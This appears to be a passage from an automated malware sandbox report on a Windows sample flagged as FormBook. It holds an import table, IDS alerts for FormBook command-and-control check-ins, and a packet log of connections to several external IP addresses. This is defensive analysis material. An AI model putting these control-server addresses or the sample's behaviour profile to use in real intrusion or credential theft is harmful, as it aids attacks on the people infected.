LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                        GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                        COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                        OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishGreat Britain
                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-12-11T04:50:45.119882+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449743156.226.63.1380TCP
                                                        2024-12-11T04:50:45.119882+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449743156.226.63.1380TCP
                                                        2024-12-11T04:50:58.497436+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449779103.120.80.11180TCP
                                                        2024-12-11T04:51:01.162817+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449785103.120.80.11180TCP
                                                        2024-12-11T04:51:03.835191+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449792103.120.80.11180TCP
                                                        2024-12-11T04:51:06.514751+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449803103.120.80.11180TCP
                                                        2024-12-11T04:51:06.514751+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449803103.120.80.11180TCP
                                                        2024-12-11T04:51:13.697181+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44981938.180.232.10980TCP
                                                        2024-12-11T04:51:16.397420+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44982538.180.232.10980TCP
                                                        2024-12-11T04:51:19.144276+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44983138.180.232.10980TCP
                                                        2024-12-11T04:51:21.719194+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44984238.180.232.10980TCP
                                                        2024-12-11T04:51:21.719194+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44984238.180.232.10980TCP
                                                        2024-12-11T04:51:28.700584+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449858172.67.158.8180TCP
                                                        2024-12-11T04:51:31.372469+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449864172.67.158.8180TCP
                                                        2024-12-11T04:51:34.028762+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449870172.67.158.8180TCP
                                                        2024-12-11T04:51:36.729307+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449876172.67.158.8180TCP
                                                        2024-12-11T04:51:36.729307+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449876172.67.158.8180TCP
                                                        2024-12-11T04:51:43.656842+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449897208.91.197.2780TCP
                                                        2024-12-11T04:51:46.298121+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449903208.91.197.2780TCP
                                                        2024-12-11T04:51:48.968786+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449909208.91.197.2780TCP
                                                        2024-12-11T04:51:51.917630+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449915208.91.197.2780TCP
                                                        2024-12-11T04:51:51.917630+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449915208.91.197.2780TCP
                                                        2024-12-11T04:51:58.789056+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449936172.67.182.19880TCP
                                                        2024-12-11T04:52:01.448282+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449942172.67.182.19880TCP
                                                        2024-12-11T04:52:04.122102+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449948172.67.182.19880TCP
                                                        2024-12-11T04:52:06.804180+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449954172.67.182.19880TCP
                                                        2024-12-11T04:52:06.804180+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449954172.67.182.19880TCP
                                                        2024-12-11T04:52:13.920650+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449975209.74.79.4080TCP
                                                        2024-12-11T04:52:16.585115+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449981209.74.79.4080TCP
                                                        2024-12-11T04:52:19.304264+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449987209.74.79.4080TCP
                                                        2024-12-11T04:52:21.917490+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449993209.74.79.4080TCP
                                                        2024-12-11T04:52:21.917490+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449993209.74.79.4080TCP
                                                        2024-12-11T04:52:29.278827+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45001413.228.81.3980TCP
                                                        2024-12-11T04:52:31.935159+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002013.228.81.3980TCP
                                                        2024-12-11T04:52:34.606926+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002613.228.81.3980TCP
                                                        2024-12-11T04:52:37.334499+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45003113.228.81.3980TCP
                                                        2024-12-11T04:52:37.334499+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45003113.228.81.3980TCP
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 11, 2024 04:50:40.412657976 CET4974380192.168.2.4156.226.63.13
                                                        Dec 11, 2024 04:50:40.532497883 CET8049743156.226.63.13192.168.2.4
                                                        Dec 11, 2024 04:50:40.532612085 CET4974380192.168.2.4156.226.63.13
                                                        Dec 11, 2024 04:50:40.606653929 CET4974380192.168.2.4156.226.63.13
                                                        Dec 11, 2024 04:50:40.726033926 CET8049743156.226.63.13192.168.2.4
                                                        Dec 11, 2024 04:50:45.119699001 CET8049743156.226.63.13192.168.2.4
                                                        Dec 11, 2024 04:50:45.119739056 CET8049743156.226.63.13192.168.2.4
                                                        Dec 11, 2024 04:50:45.119882107 CET4974380192.168.2.4156.226.63.13
                                                        Dec 11, 2024 04:50:45.123187065 CET4974380192.168.2.4156.226.63.13
                                                        Dec 11, 2024 04:50:45.242427111 CET8049743156.226.63.13192.168.2.4
                                                        Dec 11, 2024 04:50:56.750209093 CET4977980192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:50:56.981034040 CET8049779103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:50:56.981170893 CET4977980192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:50:56.996035099 CET4977980192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:50:57.115333080 CET8049779103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:50:58.497436047 CET4977980192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:50:58.497999907 CET8049779103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:50:58.498078108 CET4977980192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:50:58.616863012 CET8049779103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:50:59.518802881 CET4978580192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:50:59.638195038 CET8049785103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:50:59.642565012 CET4978580192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:50:59.656758070 CET4978580192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:50:59.776009083 CET8049785103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:01.162755013 CET8049785103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:01.162817001 CET4978580192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:51:01.169282913 CET4978580192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:51:01.290003061 CET8049785103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:02.189766884 CET4979280192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:51:02.309118986 CET8049792103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:02.309180021 CET4979280192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:51:02.324479103 CET4979280192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:51:02.443912983 CET8049792103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:02.443923950 CET8049792103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:02.444031954 CET8049792103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:02.444040060 CET8049792103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:02.444153070 CET8049792103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:02.444160938 CET8049792103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:02.444257021 CET8049792103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:02.444346905 CET8049792103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:02.444355011 CET8049792103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:03.835136890 CET8049792103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:03.835191011 CET4979280192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:51:03.844250917 CET4979280192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:51:03.963449001 CET8049792103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:04.864895105 CET4980380192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:51:04.984179020 CET8049803103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:04.984257936 CET4980380192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:51:04.993350029 CET4980380192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:51:05.112617016 CET8049803103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:06.514564991 CET8049803103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:06.514604092 CET8049803103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:06.514728069 CET8049803103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:06.514740944 CET8049803103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:06.514750957 CET4980380192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:51:06.514826059 CET4980380192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:51:06.514853001 CET8049803103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:06.514864922 CET8049803103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:06.514908075 CET4980380192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:51:06.515535116 CET8049803103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:06.515582085 CET4980380192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:51:06.555943012 CET4980380192.168.2.4103.120.80.111
                                                        Dec 11, 2024 04:51:06.675213099 CET8049803103.120.80.111192.168.2.4
                                                        Dec 11, 2024 04:51:12.337590933 CET4981980192.168.2.438.180.232.109
                                                        Dec 11, 2024 04:51:12.456949949 CET804981938.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:12.457067966 CET4981980192.168.2.438.180.232.109
                                                        Dec 11, 2024 04:51:12.500242949 CET4981980192.168.2.438.180.232.109
                                                        Dec 11, 2024 04:51:12.619546890 CET804981938.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:13.696995974 CET804981938.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:13.697079897 CET804981938.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:13.697180986 CET4981980192.168.2.438.180.232.109
                                                        Dec 11, 2024 04:51:14.013144970 CET4981980192.168.2.438.180.232.109
                                                        Dec 11, 2024 04:51:15.031809092 CET4982580192.168.2.438.180.232.109
                                                        Dec 11, 2024 04:51:15.151046038 CET804982538.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:15.151163101 CET4982580192.168.2.438.180.232.109
                                                        Dec 11, 2024 04:51:15.166853905 CET4982580192.168.2.438.180.232.109
                                                        Dec 11, 2024 04:51:15.286143064 CET804982538.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:16.397347927 CET804982538.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:16.397361994 CET804982538.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:16.397419930 CET4982580192.168.2.438.180.232.109
                                                        Dec 11, 2024 04:51:16.669384956 CET4982580192.168.2.438.180.232.109
                                                        Dec 11, 2024 04:51:17.695123911 CET4983180192.168.2.438.180.232.109
                                                        Dec 11, 2024 04:51:17.814490080 CET804983138.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:17.814723969 CET4983180192.168.2.438.180.232.109
                                                        Dec 11, 2024 04:51:17.832076073 CET4983180192.168.2.438.180.232.109
                                                        Dec 11, 2024 04:51:17.978487015 CET804983138.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:17.978502989 CET804983138.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:17.978544950 CET804983138.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:17.978565931 CET804983138.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:17.978636980 CET804983138.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:17.978681087 CET804983138.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:17.990880966 CET804983138.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:17.990896940 CET804983138.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:18.048005104 CET804983138.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:19.144105911 CET804983138.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:19.144119024 CET804983138.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:19.144275904 CET4983180192.168.2.438.180.232.109
                                                        Dec 11, 2024 04:51:19.341212988 CET4983180192.168.2.438.180.232.109
                                                        Dec 11, 2024 04:51:20.362864971 CET4984280192.168.2.438.180.232.109
                                                        Dec 11, 2024 04:51:20.482189894 CET804984238.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:20.482297897 CET4984280192.168.2.438.180.232.109
                                                        Dec 11, 2024 04:51:20.552975893 CET4984280192.168.2.438.180.232.109
                                                        Dec 11, 2024 04:51:20.672312021 CET804984238.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:21.718976974 CET804984238.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:21.719145060 CET804984238.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:21.719193935 CET4984280192.168.2.438.180.232.109
                                                        Dec 11, 2024 04:51:21.721590996 CET4984280192.168.2.438.180.232.109
                                                        Dec 11, 2024 04:51:21.840797901 CET804984238.180.232.109192.168.2.4
                                                        Dec 11, 2024 04:51:27.059721947 CET4985880192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:27.179415941 CET8049858172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:27.179569960 CET4985880192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:27.196443081 CET4985880192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:27.315742016 CET8049858172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:28.700583935 CET4985880192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:28.731141090 CET8049858172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:28.731328011 CET4985880192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:28.731714964 CET8049858172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:28.731724977 CET8049858172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:28.731790066 CET4985880192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:28.732098103 CET4985880192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:28.820195913 CET8049858172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:28.820281029 CET4985880192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:29.721398115 CET4986480192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:29.840771914 CET8049864172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:29.840970039 CET4986480192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:29.856681108 CET4986480192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:29.976002932 CET8049864172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:31.372468948 CET4986480192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:31.383346081 CET8049864172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:31.383435011 CET4986480192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:31.384581089 CET8049864172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:31.384635925 CET4986480192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:31.491879940 CET8049864172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:31.491928101 CET4986480192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:32.391833067 CET4987080192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:32.511094093 CET8049870172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:32.511321068 CET4987080192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:32.526695967 CET4987080192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:32.646281004 CET8049870172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:32.646291971 CET8049870172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:32.646305084 CET8049870172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:32.646312952 CET8049870172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:32.646322012 CET8049870172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:32.646328926 CET8049870172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:32.646398067 CET8049870172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:32.646410942 CET8049870172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:32.646447897 CET8049870172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:34.028762102 CET4987080192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:34.128335953 CET8049870172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:34.128408909 CET4987080192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:34.129868984 CET8049870172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:34.129924059 CET4987080192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:34.129926920 CET8049870172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:34.129971981 CET4987080192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:34.148109913 CET8049870172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:34.148180962 CET4987080192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:35.047310114 CET4987680192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:35.166672945 CET8049876172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:35.166786909 CET4987680192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:35.175901890 CET4987680192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:35.295105934 CET8049876172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:36.729027033 CET8049876172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:36.729120970 CET8049876172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:36.729306936 CET4987680192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:36.729680061 CET8049876172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:36.729809999 CET8049876172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:36.729856968 CET4987680192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:36.734237909 CET4987680192.168.2.4172.67.158.81
                                                        Dec 11, 2024 04:51:36.853533030 CET8049876172.67.158.81192.168.2.4
                                                        Dec 11, 2024 04:51:42.356647015 CET4989780192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:42.475958109 CET8049897208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:42.476214886 CET4989780192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:42.490637064 CET4989780192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:42.610102892 CET8049897208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:43.656692982 CET8049897208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:43.656841993 CET4989780192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:43.997472048 CET4989780192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:44.116652966 CET8049897208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:45.016143084 CET4990380192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:45.135852098 CET8049903208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:45.136068106 CET4990380192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:45.155157089 CET4990380192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:45.274524927 CET8049903208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:46.297961950 CET8049903208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:46.298120975 CET4990380192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:46.669450045 CET4990380192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:46.788727999 CET8049903208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:47.688776016 CET4990980192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:47.808051109 CET8049909208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:47.808296919 CET4990980192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:47.824281931 CET4990980192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:47.943628073 CET8049909208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:47.943679094 CET8049909208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:47.943792105 CET8049909208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:47.943800926 CET8049909208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:47.943888903 CET8049909208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:47.943900108 CET8049909208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:47.943984032 CET8049909208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:47.943999052 CET8049909208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:47.944010019 CET8049909208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:48.968738079 CET8049909208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:48.968786001 CET4990980192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:49.325714111 CET4990980192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:49.445152044 CET8049909208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:50.344542027 CET4991580192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:50.463824987 CET8049915208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:50.463922024 CET4991580192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:50.473486900 CET4991580192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:50.592713118 CET8049915208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:51.917220116 CET8049915208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:51.917275906 CET8049915208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:51.917287111 CET8049915208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:51.917629957 CET4991580192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:51.962696075 CET8049915208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:51.962786913 CET8049915208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:51.962814093 CET4991580192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:51.962831974 CET4991580192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:51.965758085 CET4991580192.168.2.4208.91.197.27
                                                        Dec 11, 2024 04:51:52.084945917 CET8049915208.91.197.27192.168.2.4
                                                        Dec 11, 2024 04:51:57.369290113 CET4993680192.168.2.4172.67.182.198
                                                        Dec 11, 2024 04:51:57.488725901 CET8049936172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:51:57.488786936 CET4993680192.168.2.4172.67.182.198
                                                        Dec 11, 2024 04:51:57.503652096 CET4993680192.168.2.4172.67.182.198
                                                        Dec 11, 2024 04:51:57.622980118 CET8049936172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:51:58.787681103 CET8049936172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:51:58.788957119 CET8049936172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:51:58.789056063 CET4993680192.168.2.4172.67.182.198
                                                        Dec 11, 2024 04:51:59.013286114 CET4993680192.168.2.4172.67.182.198
                                                        Dec 11, 2024 04:52:00.032165051 CET4994280192.168.2.4172.67.182.198
                                                        Dec 11, 2024 04:52:00.151792049 CET8049942172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:52:00.151982069 CET4994280192.168.2.4172.67.182.198
                                                        Dec 11, 2024 04:52:00.167243004 CET4994280192.168.2.4172.67.182.198
                                                        Dec 11, 2024 04:52:00.286675930 CET8049942172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:52:01.447227955 CET8049942172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:52:01.448230982 CET8049942172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:52:01.448282003 CET4994280192.168.2.4172.67.182.198
                                                        Dec 11, 2024 04:52:01.669406891 CET4994280192.168.2.4172.67.182.198
                                                        Dec 11, 2024 04:52:02.688574076 CET4994880192.168.2.4172.67.182.198
                                                        Dec 11, 2024 04:52:02.808310032 CET8049948172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:52:02.808419943 CET4994880192.168.2.4172.67.182.198
                                                        Dec 11, 2024 04:52:02.823101044 CET4994880192.168.2.4172.67.182.198
                                                        Dec 11, 2024 04:52:02.942742109 CET8049948172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:52:02.942785978 CET8049948172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:52:02.942872047 CET8049948172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:52:02.942926884 CET8049948172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:52:02.942961931 CET8049948172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:52:02.943135977 CET8049948172.67.182.198192.168.2.4
